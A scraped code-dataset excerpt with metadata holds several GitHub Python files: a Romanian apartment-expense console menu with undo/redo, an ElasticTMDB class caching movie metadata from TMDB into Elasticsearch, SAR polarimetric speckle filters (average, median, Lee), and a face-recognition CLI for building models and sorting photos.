{
"api_name": "numpy.random.randint",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 72,
"usage_type": "attribute"
},
{
"api_name": "numpy.random.randint",
"line_number": 74,
"usage_type": "call"
},
{
"api_name": "numpy.ran... |
71133520507 | from Logic.Crud import *
from Logic.Operatii import *
import datetime
def arata_meniu():
'''
:return: optiunile din meniu
'''
print("1.Adaugare cheltuiala")
print("2.Stergere cheltuiala")
print("3.Modificare cheltuiala")
print("4.Stergerea cheltuielilor pentru un nr de apartament")
print("5.Adaugre suma pentru toate cheltuielile dintr-o data citita de la tastatura")
print("6.Afisarea cheltuielilor cu suma cea mai mare pentru fiecare tip")
print("7.Ordonarea cheltuielilor crescator dupa suma")
print("8.Afisarea sumelor lunare pentru fiecare apartament")
print("9.Afisare lista")
print("10.Undo")
print("11.Redo")
print("0.Iesire")
def citire_data():
date_str=input("Dati data separate prin spatiu")
data=date_str.split(" ")
an=int(data[0])
luna=int(data[1])
zi=int(data[2])
return datetime.date(an,luna,zi)
def afisare_adaugare(lista,lst_undo,lst_redo):
"""
:param lista: lista cu cheltuielei
:return: se adauga cheltuiala creata in logic
"""
try:
id=int(input("Dati id :"))
nr_apartament = int(input('Dati nr apartamentului : '))
suma = float(input('Dati suma: '))
data = input("Dati data separata prin - :")
tipul = input("Dati tipul:")
return adaugare_cheltuiala(lista, id, nr_apartament, suma, data, tipul,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_stergere(lista,lst_undo,lst_redo):
'''
:param lista: o lista cu cheltuieli
:return: se sterge o cheltuiala din lista
'''
try:
nr_apartament = int(input("Dati nr apartamentului care va fi sters"))
return stergere_cheltuiala(nr_apartament, lista,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_modificare(lista,lst_undo,lst_redo):
'''
:param lista:lista de cheltuieli
:return: se modifica lista
'''
try:
id=int(input("Dati id "))
nr_apartament =int(input('Dati nr apartamentului de modificat: '))
suma = float(input('Dati suma: '))
data = input("Dati data separata prin -:")
tipul = input('Dati tipul: ')
return modificare_cheltuiala(lista,id, nr_apartament, suma, data, tipul,lst_undo,lst_redo)
except ValueError as ve:
print("Eroare",ve)
return lista
def afisare_stergere_cheltuiala_nr_apartament(lista,lst_undo,lst_redo):
'''
Se sterge ultima cheltuiala care are un nr de apartament dat
:param lista: lista de cheltuieli
:return: lista cu cheltuielile ramase
'''
nr_apartament=int(input("Introduceti nr de apartament:"))
return stergere_cheltuieli_pentru_un_apartament(lista,nr_apartament,lst_undo,lst_redo)
def afisare_adaugare_valoare_la_toate_cheltuielile(lista,lst_redo,lst_undo):
'''
:param lista: lista de cheltuieli
:return: se modifica lista cu cerintele din enunt
'''
dat= input("Dati data separata prin -:")
sum = int(input("Dati suma:"))
cheltuieli_lista = adunare_valoare_la_toate_cheltuielile(lista,dat,sum,lst_undo,lst_redo)
return cheltuieli_lista
def afisare_maxim_cheltuieli_pentru_fiecare_tip(lista):
tip_cheltuieli=max_cheltuiala_pentru_fiecare_tip(lista)
for tipul,cheltuiala in tip_cheltuieli.items():
print("{} : {}".format(tipul,cheltuiala))
def afisare_sume_lunare_cheltuieli(lista):
result = sume_lunare(lista)
for luna in result:
print(f'Pentru Luna {luna} avem lista de sume: {result[luna]}')
def afisare_lista(lista):
for cheltuiala in lista:
print(to_string(cheltuiala))
def afisare_undo(lista, lst_undo, lst_redo):
undo_result = undo(lista, lst_undo, lst_redo)
if undo_result is not None:
return undo_result
return lista
def afisare_redo(lista, lst_undo, lst_redo):
redo_result = redo(lista, lst_undo, lst_redo)
if redo_result is not None:
return redo_result
return lista
def interfata(lista,lst_undo,lst_redo):
"""meniulde comanda"""
while True:
arata_meniu()
op=int(input("Alegeti optiunea"))
if op == 1:
lista=afisare_adaugare(lista,lst_undo,lst_redo)
if op==2:
lista=afisare_stergere(lista,lst_undo,lst_redo)
if op==3:
lista=afisare_modificare(lista,lst_undo,lst_redo)
if op==4:
lista=afisare_stergere_cheltuiala_nr_apartament(lista,lst_undo,lst_redo)
if op==5:
lista=afisare_adaugare_valoare_la_toate_cheltuielile(lista,lst_undo,lst_redo)
if op ==6:
print(max_cheltuiala_pentru_fiecare_tip(lista))
if op ==7:
lista = ordonare_cheltuieli_dupa_suma(lista,lst_undo,lst_redo)
if op==8:
afisare_sume_lunare_cheltuieli(lista)
if op == 9:
afisare_lista(lista)
if op ==10:
lista=afisare_undo(lista,lst_undo,lst_redo)
if op==11:
lista=afisare_redo(lista,lst_undo,lst_redo)
if op == 0:
break
else:
print("Invalid")
| AP-MI-2021/lab-567-Pop-Sergiu-Adrian | lab5/Ui/Interfata.py | Interfata.py | py | 5,122 | python | es | code | 0 | github-code | 6 | [
{
"api_name": "datetime.date",
"line_number": 30,
"usage_type": "call"
}
] |
6433666492 | import logging
import requests
import elasticsearch
import datetime
import os
import re
from .config import set_defaults
from jinja2 import Template
class ElasticTMDB(object):
def load_config(self):
set_defaults(self)
# Set HTTP headers for TMDB requests
self.headers = {}
self.headers["content-type"] = "application/json;charset=utf-8"
self.headers["Accept-Encoding"] = "gzip"
if not self.config["extra_logging"]:
logging.getLogger("elasticsearch").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
logging.getLogger("requests").setLevel(logging.WARNING)
# ElasticSearch
elasticAuth = (self.config["es_username"], self.config["es_password"])
self.es = elasticsearch.Elasticsearch(hosts=self.config["es_host"],
port=self.config["es_port"],
scheme=self.config["es_scheme"],
http_auth=elasticAuth)
# Generate Index names and create them if they do not exists
self.config["title_index"] = "{}_{}_title".format(self.config["index_prefix"], self.config["title_type"])
self.config["search_index"] = "{}_{}_search".format(self.config["index_prefix"], self.config["title_type"])
self.check_index(indexName=self.config["title_index"], indexMappingFile="title.json")
self.check_index(indexName=self.config["search_index"], indexMappingFile="search.json")
# Get countries, generes, background base URL and languages from TMDB
if self.config["initial_cache_tmdb"]:
self.cache_configuration()
else:
logging.debug("Skipping Initial TMDB config...some functions might break")
def load_template(self, templateFile):
with open(os.path.join(os.path.dirname(__file__), "templates", templateFile), "r") as templateFile:
return Template(templateFile.read())
def send_request_get(self, endPoint=None, params=None):
if not params:
params = {}
if "language" not in params:
params["language"] = self.config["main_language"]
elif params["language"] == "":
del params["language"]
params["api_key"] = self.config["tmdb_api_key"]
if endPoint:
response = requests.get("https://api.themoviedb.org/3/{}".format(endPoint), params=params, headers=self.headers)
if response:
if response.status_code < 400:
return response.json()
else:
logging.error("Error Code {} - Message {}".format(response.status_code, response.json()["status_message"]))
del params["api_key"]
logging.error("Error Endpoint {} - Params {}".format(endPoint, params))
return None
else:
logging.error("Error Code {} - Message {}".format(response.status_code, response.json()["status_message"]))
del params["api_key"]
logging.error("Error Endpoint {} - Params {}".format(endPoint, params))
return None
def discover_title(self, page):
params = {}
params["sort_by"] = "popularity.desc"
params["page"] = page
discover = self.send_request_get(endPoint="discover/{}".format(self.config["title_type"]), params=params)
if discover:
return discover["results"]
def cache_title(self, title, force, record):
recordId = None
# Check if record exists in elasticsearch
if not record:
query = {"query": {"term": {"ids.tmdb": title["id"]}}}
esRecord = self.get_record_by_query(index=self.config["title_index"], query=query)
if esRecord["hits"]["hits"]:
recordId = esRecord["hits"]["hits"][0]["_id"]
record = esRecord["hits"]["hits"][0]["_source"]
else:
recordId = record["_id"]
esRecord = {"hits": {"hits": [record]}}
record = record["_source"]
if record:
# Check if record is up for an update
if self.check_update_required(timestamp=record["@timestamp"]):
force = True
if not recordId or force:
# Get details of title
params = {}
if title["original_language"] == self.config["exception_language"]:
params["language"] = self.config["exception_language"]
else:
params["language"] = self.config["main_language"]
title = self.send_request_get(endPoint="{}/{}".format(self.config["title_type"], title["id"]), params=params)
if title:
# Get title year, to be used for display
if not title.get(self.attrib["date"]):
titleYear = "None"
else:
titleYear = title[self.attrib["date"]][:4]
if recordId:
logging.info("Updating details : {} ({}) ({})".format(title.get(self.attrib["title"], "N/A"), titleYear, self.config["title_type"]))
else:
logging.info("Getting details : {} ({}) ({})".format(title.get(self.attrib["title"], "N/A"), titleYear, self.config["title_type"]))
# Add langauge if not in record
if "language" not in record:
record["language"] = title["original_language"]
# Add title if not in record
if "title" not in record:
record["title"] = title[self.attrib["title"]]
# Add country if not in record
if "country" not in record:
record["country"] = []
if "production_countries" in title:
for country in title["production_countries"]:
if country["iso_3166_1"] not in record["country"]:
record["country"].append(country["iso_3166_1"])
if "origin_country" in title:
for country in title["origin_country"]:
if country not in record["country"]:
record["country"].append(country)
# Add rating and number of votes
if "rating" not in record:
record["rating"] = {}
record["rating"]["tmdb"] = {}
record["rating"]["tmdb"]["votes"] = title["vote_count"]
record["rating"]["tmdb"]["average"] = title["vote_average"]
# Add original title to aliases if different
if "alias" not in record:
record["alias"] = []
if title[self.attrib["title"]] != title[self.attrib["original_title"]]:
if self.check_for_dup(title[self.attrib["original_title"]], record["alias"], record["title"]):
record["alias"].append(title[self.attrib["original_title"]])
# Release year
if "year" not in record:
record["year"] = None
if title[self.attrib["date"]] != "None":
if title[self.attrib["date"]]:
record["year"] = int(title[self.attrib["date"]][:4])
# Get genres
if "genre" not in record:
record["genre"] = []
for genre in title["genres"]:
if genre["id"] not in record["genre"]:
record["genre"].append(genre["id"])
# Get cast, director and other crew
if "credits" not in record:
record["credits"] = {}
cast = self.send_request_get(endPoint="{}/{}/credits".format(self.config["title_type"], title["id"]))
# Save top 10 cast
for person in sorted(cast["cast"], key=lambda k: (k["order"])):
if "actor" not in record["credits"]:
record["credits"]["actor"] = []
if len(record["credits"]["actor"]) < 10:
if self.check_for_dup(person["name"], record["credits"]["actor"]):
record["credits"]["actor"].append(person["name"])
# Save director and 5 other members of crew (producers etc)
for person in cast["crew"]:
if person["job"] == 'Director':
if "director" not in record["credits"]:
record["credits"]["director"] = []
if self.check_for_dup(person["name"], record["credits"]["director"]):
record["credits"]["director"].append(person["name"])
else:
if "other" not in record["credits"]:
record["credits"]["other"] = []
if len(record["credits"]["other"]) < 5:
if self.check_for_dup(person["name"], record["credits"]["other"]):
record["credits"]["other"].append(person["name"])
# Get description (and only keep first paragraph) save it only if longer then record if present
if "overview" in title:
if "description" not in record:
record["description"] = ""
# Keep only first paragraph of overview
regex = re.search(r'^(.+?)\n\n', title["overview"])
if regex:
overview = regex.group(1)
else:
overview = title["overview"]
# Keep longer one
if len(overview) > len(record["description"]):
record["description"] = overview
# Save tagline if incoming one is longer
if "tagline" in title:
if "tagline" not in record:
record["tagline"] = ""
if len(record["tagline"]) > len(record["tagline"]):
record["tagline"] = title["tagline"]
# Get translations
translations = self.send_request_get(endPoint="{}/{}/translations".format(self.config["title_type"], title["id"]))
for translation in translations["translations"]:
if translation["iso_639_1"] in self.config["languages"]:
# Add Aliases
if self.check_for_dup(translation["data"][self.attrib["title"]], record["alias"], record["title"]):
record["alias"].append(translation["data"][self.attrib["title"]])
# Get alternative titles
altTitles = self.send_request_get(endPoint="{}/{}/alternative_titles".format(self.config["title_type"], title["id"]))
for titleName in altTitles[self.attrib["alt_titles"]]:
if titleName["iso_3166_1"] in self.config["countries"]:
if self.check_for_dup(titleName["title"], record["alias"], record["title"]):
record["alias"].append(titleName["title"])
# Get images not not is avaliable
if "image" not in record:
record["image"] = ""
if title["original_language"] == self.config["exception_language"]:
params = {"language": title["original_language"]}
else:
params = {"language": self.config["main_language"]}
images = self.send_request_get(endPoint="{}/{}/images".format(self.config["title_type"], title["id"]), params=params)
if not images["posters"] and not images["backdrops"]:
# Try to search without any language for art
images = self.send_request_get(endPoint="{}/{}/images".format(self.config["title_type"], title["id"]), params={"language": ""})
imageAspectRatio = 10
for image in images["posters"] + images["backdrops"]:
if abs(image["aspect_ratio"] - self.config["image_aspect_ratio"]) < abs(imageAspectRatio - self.config["image_aspect_ratio"]):
record["image"] = image["file_path"][1:]
imageAspectRatio = abs(imageAspectRatio - self.config["image_aspect_ratio"])
# Get TMDB Record IDs
if "ids" not in record:
record["ids"] = {}
if "tmdb" not in record["ids"]:
record["ids"]["tmdb"] = title["id"]
self.index_record(index=self.config["title_index"], recordId=recordId, record=record)
else:
logging.debug("No update required for {} ({}) ({})".format(esRecord["hits"]["hits"][0]["_source"]["title"], esRecord["hits"]["hits"][0]["_source"]["year"], self.config["title_type"]))
return record
    def search_title(self, search):
        """Resolve a title record from elasticsearch, progressively widening the search.

        Each step below only runs while no match has been found (or when
        search["force"] is set): 1) direct query; 2) cache TMDB credits for
        the supplied crew members and retry; 3) cache TMDB results for each
        supplied title string and retry; 4) exact keyword match; 5) retry with
        widening +/- year ranges (provider-supplied years are often off).

        Args:
            search: dict with optional keys "title" (list of strings),
                "director"/"actor"/"other" (lists of names), "year",
                "country" and "force" (re-cache even on a hit).

        Returns:
            The processed elasticsearch hit (see process_result) or None.
        """
        # First query elasticsearch and check if title is returned without any additional caching
        result = self.query_title(search=search)
        # If no title has been returned, search by director and actors
        if not result or search.get("force"):
            crew = search.get("director", []) + search.get("actor", []) + search.get("other", [])
            for person in crew:
                self.search_person_tmdb(person=person, year=search.get("year"), force=search.get("force"))
                # Query again in elasticsearch and if match then break
                result = self.query_title(search=search)
                if result:
                    break
        # If no result found, search by name and year if available
        if not result or search.get("force"):
            if "title" in search:
                for title in search["title"]:
                    self.search_title_tmdb(title=title, year=search.get("year"), force=search.get("force"))
                result = self.query_title(search=search)
        # Try an exact match if no result yet
        if not result:
            if "title" in search:
                result = self.query_title_exact(search=search)
        # Try adjacent years if provided year is not a hit. This is a workaround as the year supplied by some providers is inaccurate
        if not result:
            if search.get("year"):
                for yearDiff in range(0, self.config["year_diff"] + 1):
                    final = False
                    if yearDiff == self.config["year_diff"]:
                        final = True
                    result = self.query_title(search=search, yearDiff=yearDiff, final=final)
                    if result:
                        break
            else:
                result = self.query_title(search=search, final=True)
        if result:
            logging.debug("Found {} ({}) in elasticsearch (Score: {:.1f})".format(result["_source"]["title"], self.config["title_type"], result["_score"]))
            result = self.process_result(result=result, force=search.get("force"))
        return result
def query_title_exact(self, search):
query = {"from": 0, "size": 1, "query": {}}
query["query"]["bool"] = {}
query["query"]["bool"]["should"] = []
if "title" in search:
for title in search["title"]:
query["query"]["bool"]["should"].append({"multi_match": {"query": title, "fields": ["title.keyword", "alias.keyword"]}})
result = self.get_record_by_query(index=self.config["title_index"], query=query)
if result["hits"]["total"]["value"] > 0:
if result["hits"]["hits"][0]["_score"] >= self.config["min_score_exact"]:
return result["hits"]["hits"][0]
def query_title(self, search, final=False, yearDiff=0):
query = {"from": 0, "size": 1, "query": {}}
query["query"]["bool"] = {}
query["query"]["bool"]["must"] = []
query["query"]["bool"]["should"] = []
if "title" in search:
for title in search["title"]:
query["query"]["bool"]["should"].append({"multi_match": {"query": title, "fields": ["title", "alias"]}})
if "director" in search:
for director in search["director"]:
query["query"]["bool"]["should"].append({"match": {"credits.director": director}})
if "actor" in search:
for actor in search["actor"]:
query["query"]["bool"]["should"].append({"match": {"credits.actor": actor}})
if "other" in search:
for producer in search["other"]:
query["query"]["bool"]["should"].append({"match": {"credits.other": producer}})
if "country" in search:
for country in search["country"]:
countryCode = self.countryCodes.get(country)
if countryCode:
query["query"]["bool"]["should"].append({"match": {"country": countryCode}})
if "year" in search:
search["year"] = int(search["year"])
year = {}
year["bool"] = {}
year["bool"]["should"] = []
year["bool"]["should"].append({"range": {"year": {"gte": search["year"] - yearDiff, "lte": search["year"] + yearDiff}}})
query["query"]["bool"]["must"].append(year)
# Calculate min score
if not final:
minScore = self.config["min_score_no_search"]
else:
minScore = self.config["min_score"]
if "actor" in search:
minScore += len(search["actor"] * self.config["score_increment_per_actor"])
result = self.get_record_by_query(index=self.config["title_index"], query=query)
if result["hits"]["total"]["value"] > 0:
if result["hits"]["hits"][0]["_score"] >= minScore:
return result["hits"]["hits"][0]
if final:
logging.debug("Best result {} (Score: {:.1f} Min Score: {})".format(result["hits"]["hits"][0]["_source"]["title"], result["hits"]["hits"][0]["_score"], minScore))
else:
if final:
logging.debug("No results found for {}".format(search["title"][0]))
def process_result(self, result, force):
# Check if record requires updating
title = {"id": result["_source"]["ids"]["tmdb"], "original_language": result["_source"]["language"]}
result["_source"] = self.cache_title(title=title, force=force, record=result)
# Generate full image URL if missing
result["_source"]["image"] = self.get_image_url(image=result["_source"]["image"])
# Convert country code to full name
countries = []
for countryCode in result["_source"]["country"]:
countries.append(self.countries.get(countryCode, "Unknown"))
result["_source"]["country"] = countries
# Convert language code to full name
result["_source"]["language"] = self.languages.get(result["_source"]["language"], "Unknown")
# Convert genre code
genres = []
for genreId in result["_source"]["genre"]:
genre = self.genres.get(genreId)
if genre:
genres.append(self.genres[genreId])
if genres:
result["_source"]["genre"] = genres
return result
    def search_person_tmdb(self, person, year, force):
        """Search TMDB for a person and cache the titles they are credited on.

        A marker record (person + year) is stored in the search index so the
        same lookup is skipped until check_update_required says it is stale.
        When `year` is truthy, only credits within config["year_diff"] years
        of it are cached; credits without a release date are cached regardless.

        Args:
            person: name to search for on TMDB.
            year: release year used to narrow credits, or None/falsy for all.
            force: when True, query TMDB even if a fresh marker exists.
        """
        performSearch = force
        recordId = None
        # Check if search was already performed
        query = {"query": {"bool": {"must": []}}}
        query["query"]["bool"]["must"].append({"term": {"person": person}})
        # year is stored as -1 when no year was supplied
        query["query"]["bool"]["must"].append({"term": {"year": year or -1}})
        result = self.get_record_by_query(index=self.config["search_index"], query=query)
        if result["hits"]["total"]["value"] == 0:
            performSearch = True
        else:
            # Check if person is up for an update:
            if self.check_update_required(timestamp=result["hits"]["hits"][0]["_source"]["@timestamp"]):
                performSearch = True
                recordId = result["hits"]["hits"][0]["_id"]
        if performSearch:
            # Query TMDB for person
            params = {"include_adult": "false", "page": 1}
            params["query"] = person
            logging.info("Searching for person : {}".format(person))
            response = self.send_request_get("search/person", params=params)
            if "total_results" in response:
                if response["total_results"] > 0:
                    for personRecord in response["results"]:
                        # Search credits of person found
                        logging.info("Getting credits : {} ({}) ({})".format(personRecord["name"], year, self.config["title_type"]))
                        # NOTE: shadows the builtin `credits` inside this loop
                        credits = self.send_request_get("person/{}/{}_credits".format(personRecord["id"], self.config["title_type"]))
                        # Find titles during years around query or if year=-1 all credits
                        if "crew" in credits:
                            for credit in credits["crew"] + credits["cast"]:
                                if "release_date" in credit and year:
                                    if credit["release_date"] != '' and credit["release_date"]:
                                        creditYear = int(credit["release_date"][:4])
                                        # Skip credits too far from the requested year
                                        if abs(year - creditYear) > self.config["year_diff"]:
                                            continue
                                self.cache_title(title=credit, force=force, record={})
            # Save that name and year to avoid doing the same search again
            record = {}
            record["person"] = person
            record["year"] = year or -1
            self.index_record(index=self.config["search_index"], record=record, recordId=recordId)
        else:
            logging.debug("Already searched credits for {} ({}) ({})".format(person, year, self.config["title_type"]))
    def search_title_tmdb(self, title, year, force):
        """Search TMDB by title (and optional year) and cache the top results.

        A marker record (title + year) is kept in the search index so the same
        title/year combination is not queried again until it is due for a
        refresh. Only the first five TMDB results are cached.

        Args:
            title: title string to search for.
            year: release year or None/falsy to search without a year filter.
            force: when True, search TMDB even if a fresh marker exists.
        """
        performSearch = force
        recordId = None
        # Check if search was already performed
        query = {"query": {"bool": {"must": []}}}
        query["query"]["bool"]["must"].append({"term": {"title": title}})
        # year is stored as -1 when no year was supplied
        query["query"]["bool"]["must"].append({"term": {"year": year or -1}})
        result = self.get_record_by_query(index=self.config["search_index"], query=query)
        if result["hits"]["total"]["value"] == 0:
            performSearch = True
        else:
            # Check if the cached search is due for a refresh:
            if self.check_update_required(timestamp=result["hits"]["hits"][0]["_source"]["@timestamp"]):
                performSearch = True
                recordId = result["hits"]["hits"][0]["_id"]
        if performSearch:
            params = {"include_adult": "false", "page": 1}
            params["query"] = title
            if year:
                params["year"] = year
            logging.info("Searching for title : {} ({}) ({})".format(title, year, self.config["title_type"]))
            response = self.send_request_get(endPoint="search/{}".format(self.config["title_type"]), params=params)
            if "total_results" in response:
                if response["total_results"] > 0:
                    # Cache only the top 5 matches
                    for result in response["results"][:5]:
                        self.cache_title(title=result, force=force, record={})
            # Save title and year to avoid doing the same search again
            record = {}
            record["title"] = title
            record["year"] = year or -1
            self.index_record(index=self.config["search_index"], record=record, recordId=recordId)
        else:
            logging.debug("Already searched title {} ({}) ({})".format(title, year, self.config["title_type"]))
def get_image_url(self, image):
if "http" not in image:
return "{}/{}".format(self.config["image_base_url"], image)
else:
return image
def check_for_dup(self, title, alias, orgTitle=""):
if title == "":
return False
if alias:
for altTitle in alias + [orgTitle]:
if re.search("^{}$".format(re.escape(title)), altTitle, flags=re.IGNORECASE):
return False
else:
return True
if orgTitle:
if re.search("^{}$".format(re.escape(title)), orgTitle, flags=re.IGNORECASE):
return False
return True
def render_template(self, record, template):
if template == "description":
return self.description_template.render(record=record)
elif template == "subtitle":
return self.subtitle_template.render(record=record)
def check_index(self, indexName, indexMappingFile):
if not self.es.indices.exists(index=indexName):
with open(os.path.join(os.path.dirname(__file__), "index_mapping", indexMappingFile), "r") as mappingFile:
indexSettings = mappingFile.read()
response = self.es.indices.create(index=indexName, body=indexSettings)
if response["acknowledged"]:
logging.info("Created {} index".format(indexName))
def get_record_by_query(self, index, query, refreshIndex=True):
if refreshIndex:
self.es.indices.refresh(index=index)
return self.es.search(index=index, body=query)
def index_record(self, index, record, recordId=None):
record["@timestamp"] = datetime.datetime.utcnow().isoformat()
self.es.index(index=index, id=recordId, body=record)
def check_update_required(self, timestamp):
timestamp = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%f")
if timestamp < datetime.datetime.utcnow() - datetime.timedelta(days=self.config["refresh_after_days"]) or timestamp <= self.config["refresh_if_older"]:
return True
else:
return False
def cache_configuration(self):
self.genres = {}
self.countries = {}
self.countryCodes = {}
self.languages = {}
genres = self.send_request_get(endPoint="genre/{}/list".format(self.config["title_type"]))
if genres:
for genre in genres["genres"]:
self.genres[genre["id"]] = genre["name"]
countries = self.send_request_get(endPoint="configuration/countries")
if countries:
for country in countries:
self.countries[country["iso_3166_1"]] = country["english_name"]
self.countryCodes[country["english_name"]] = country["iso_3166_1"]
languages = self.send_request_get(endPoint="configuration/languages")
if languages:
for language in languages:
self.languages[language["iso_639_1"]] = language["english_name"]
backgroundUrl = self.send_request_get(endPoint="configuration")
if backgroundUrl:
self.config["image_base_url"] = backgroundUrl["images"]["base_url"]
self.config["image_base_url"] += self.config["tmdb_image_type"]
| shaunschembri/ElasticTMDB | elastictmdb/__init__.py | __init__.py | py | 27,602 | python | en | code | 4 | github-code | 6 | [
{
"api_name": "config.set_defaults",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "logging.WARNING",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "logging.ge... |
659465820 |
import numpy as np
from tqdm import tqdm
from statistics import median
class Filter :
    """
    Speckle filters for polarimetric SAR images shaped (height, length, (HH, HV, VV)).

    To add :
    - Frost filter, Gamma-MAP filter, Kuan filter
    - Autoencoder filtering ?
    """
    # Class specialized for filtering SAR images formatted as (height, len, (HH, HV, VV)).
def __init__(self, img : np.ndarray , kernel_size : tuple[int,int]) -> None:
#kernel_size is the window on which we will apply our filter, example :
# if kernel_size == (3,3) then the mean will be computed on its direct neighbours in a 3x3 square.
self.original_img = img
self.kernel_size = kernel_size
self.height, self.length, self.dim = img.shape
self.k_height, self.k_length = kernel_size[0], kernel_size[1]
self.filtered_img = np.zeros_like(self.original_img)
def apply_average_filter(self):
img = self.original_img
filtered_img = np.zeros(img.shape, dtype = np.complex128)
height, length, dim = img.shape
k_height, k_length = self.kernel_size[0], self.kernel_size[1]
filtered_img = np.zeros_like(img)
for i in range(height) :
for j in range(length) :
top = max(0, i - k_height//2)
bottom = min(height, i + k_height//2 + 1)
left = max(0, j-k_length//2)
right = min(length, j + k_length//2 + 1)
filtered_img[i,j] = np.mean(img[top:bottom, left:right, :], axis = (0,1), dtype = complex)
self.filtered_img = filtered_img
def apply_median_filter(self) :
#this methods applies the median on each real part, imaginary part of each component HH, HV, VV.
for i in range(self.height) :
for k in range(self.length) :
top = max(0, i - self.k_height // 2 )
bottom = min(self.height, i + self.k_height // 2 + 1)
left = max(0, k - self.k_length // 2)
right = min(self.length, k + self.k_length // 2 + 1)
for d in range(self.dim) :
self.filtered_img[i, k, d] = median(np.real(self.original_img[top : bottom, left : right, d].reshape(-1))) + median(np.imag(self.original_img[top : bottom, left : right, d].reshape(-1))) * complex(real = 0, imag = 1)
    def apply_lee_filter(self,sigma_v = 1.15):
        """
        Apply the Lee filter to the polarimetric SAR image.

        The result is written to self.filtered_img (and also returned).
        var_y is computed locally for each pixel following Lee's article:
        "Polarimetric SAR Speckle Filtering And Its Implication For
        Classification".

        Args:
            sigma_v: arbitrarily chosen number representing the standard
                deviation of the speckle noise being filtered out.

        NOTE(review): the variance buffers inherit the image dtype via
        np.zeros_like, so for complex images the `var_x < 0` comparison below
        would raise; also img_mean[d]*img_mean[d] is the complex square, not
        |mean|^2 - confirm inputs are expected to be real-valued here.
        """
        img = self.original_img
        size = self.k_height
        # Global per-channel mean used as the filter's reference value.
        img_mean = np.mean(img, axis = (0,1))
        var_y = np.zeros_like(img)
        var_x = np.zeros_like(img)
        b = np.zeros_like(img)
        for d in range(self.dim) :
            for i in tqdm(range(self.height)) :
                for j in range(self.length) :
                    # Neighbourhood window clipped at the image borders.
                    top = max(0, i - self.k_height//2 )
                    bottom = min(self.height, i + self.k_height//2 + 1)
                    left = max(0, j - self.k_length//2)
                    right = min(self.length, j + self.k_length//2 + 1)
                    # Local variance of the observed signal: E[|y|^2] - |E[y]|^2 form.
                    var_y[i,j,d] = np.mean(self.squared_norm(img[top:bottom, left: right,d]), axis = (0,1))-self.squared_norm(np.mean(img[top:bottom, left: right,d], axis = (0,1)))
                    # Estimated variance of the underlying scene, clamped at 0.
                    var_x[i,j,d] = (var_y[i,j,d] - img_mean[d]*img_mean[d]*sigma_v*sigma_v)/(1+sigma_v*sigma_v)
                    if var_x[i,j,d] < 0 :
                        var_x[i,j,d] = 0
                    # Adaptive gain: 0 keeps the mean, 1 keeps the raw pixel.
                    b[i,j,d] = var_x[i,j,d]/var_y[i,j,d]
                    self.filtered_img[i,j,d] = img_mean[d] + b[i,j,d] * (img[i,j,d] - img_mean[d])
        return self.filtered_img
def squared_norm(self, c : complex) :
a = np.real(c)
b = np.imag(c)
return a*a + b*b
"""
Kuan and Frost filter are to be implemented
""" | ArnaudMi/Statistical-Learning-Methods-Contribution-for-the-description-of-SAR-targets | code/utils/filtre.py | filtre.py | py | 4,147 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.ndarray",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros_like",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "numpy.complex128",
... |
3806456362 | import pickle, custom_logger
from cmd_parser import parser, createModelString, performSortingString
from asyncio.log import logger
from os.path import isfile
from logging import INFO, DEBUG, WARN
import utils
import logging
# Parse CLI arguments and set logging verbosity before doing any work.
args = parser.parse_args()

if args.debug:
    custom_logger.initialize_logger(logger_level=DEBUG)
else:
    custom_logger.initialize_logger(logger_level=INFO)

if args.mode == createModelString:
    # --- "create model" mode: build face encodings and pickle them ---
    if args.name is None:
        raise Exception(
            "Please provide your name to save your face model with -n or --name"
        )
    if args.input_type == "image":
        actual_images, not_images = utils.get_images_from_folder(args.input_folder)
        logging.info(
            "Images found in folder (These will be scanned) : {}".format(actual_images)
        )
        logging.info("Non-Images found in folder : {}".format(not_images))
        if len(actual_images) == 0:
            raise Exception("No suitable images found in folder provided")
        logging.info("Tests passed, starting scan now")

        # Imported lazily: recognition_engine pulls in heavy ML dependencies.
        import recognition_engine

        actual_images = utils.join_path_list(args.input_folder, actual_images)
        encodings = recognition_engine.train_from_images(
            actual_images, debug=args.debug
        )
        logging.debug(encodings)
        # Persist the encodings under the user's name for later sorting runs.
        with open("{}.pkl".format(args.name), "wb") as f:
            pickle.dump(encodings, f)
        logging.info("Khatam!")
    elif args.input_type == "video":
        if args.input_file is None:
            raise Exception("Please provide a video input file with -i or --input_file")
        if not isfile(args.input_file):
            raise Exception(
                "'{}' is not a valid file. Please provide a valid file".format(
                    args.input_file
                )
            )
        import recognition_engine

        encodings = recognition_engine.train_from_video(
            video_path=args.input_file, debug=args.debug
        )
        with open("{}.pkl".format(args.name), "wb") as f:
            pickle.dump(encodings, f)
        logging.info("Khatam!")
    else:
        raise Exception("You need to specify input type with -t or --input_type")
elif args.mode == performSortingString:
    # --- "perform sorting" mode: match folder images against a saved model ---
    if args.name is None:
        raise Exception(
            "Please provide the name you gave while creating the model with -n or --name"
        )
    utils.verify_folder(args.input_folder)
    images_to_sort, not_to_sort = utils.get_images_from_folder(args.input_folder)
    final_paths = utils.join_path_list(args.input_folder, images_to_sort)
    encodings = None
    try:
        with open("{}.pkl".format(args.name), "rb") as f:
            encodings = pickle.load(f)
    except Exception as E:
        # A missing/corrupt model file is fatal for sorting.
        logger.critical(E)
        exit(1)
    found_directory = "found_directory"
    not_found_directory = "not_found_directory"
    utils.verify_folder(folder_path=found_directory, create=True)
    utils.verify_folder(folder_path=not_found_directory, create=True)
    # Enable parallel workers unless the user asked for a single process.
    threading = args.processes != 1
    import recognition_engine

    recognition_engine.sort_into_directories(
        images_to_test=final_paths,
        perform_transfer=True,
        debug=args.debug,
        verbose=True,
        # Bug fix: the computed flag above was previously ignored and a
        # hardcoded False was passed here.
        threading=threading,
        target_encodings=encodings,
        n_workers=args.processes,
    )
    logging.info("Khatam!")

logging.info("Ruko zara, sabar kato")
